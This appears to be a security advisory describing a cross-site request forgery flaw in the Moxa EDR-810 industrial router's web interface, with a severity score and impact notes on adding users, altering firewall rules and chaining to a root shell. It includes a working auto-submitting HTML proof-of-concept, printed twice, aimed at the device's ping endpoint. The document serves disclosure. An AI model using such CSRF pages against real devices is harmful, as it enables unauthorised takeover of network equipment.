An exploitable cross-site request forgery vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP packet can cause cross-site request forgery. An attacker can create malicious HTML to trigger this vulnerability.
Moxa EDR-810 V4.1 build 17030317
https://www.moxa.com/product/EDR-810.htm
8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-352 - Cross-Site Request Forgery (CSRF)
In order to trigger the CSRF a logged in user needs to visit a page with malicious code on it. The malicious code will be able to do anything the logged in user can do. For example the malicious code could add a user, modify firewall rules, etc. This could also be chained with a command injection to get a root shell on the device. This problem is compounded by the fact that users cannot log out of the device, meaning that a user’s session will remain valid long after they’ve stopped interacting with the device.
<html>
<body>
<form action="http://192.168.127.254/goform/net_WebPingGetValue" method="POST">
<input type="hidden" name="pingTmp" value="192.168.127.22" />
<input type="hidden" name="ifs" value="1" />
<input type="hidden" name="ip" value="192.168.127.22" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
<html>
<body>
<form action="http://192.168.127.254/goform/net_WebPingGetValue" method="POST">
<input type="hidden" name="pingTmp" value="192.168.127.22" />
<input type="hidden" name="ifs" value="1" />
<input type="hidden" name="ip" value="192.168.127.22" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>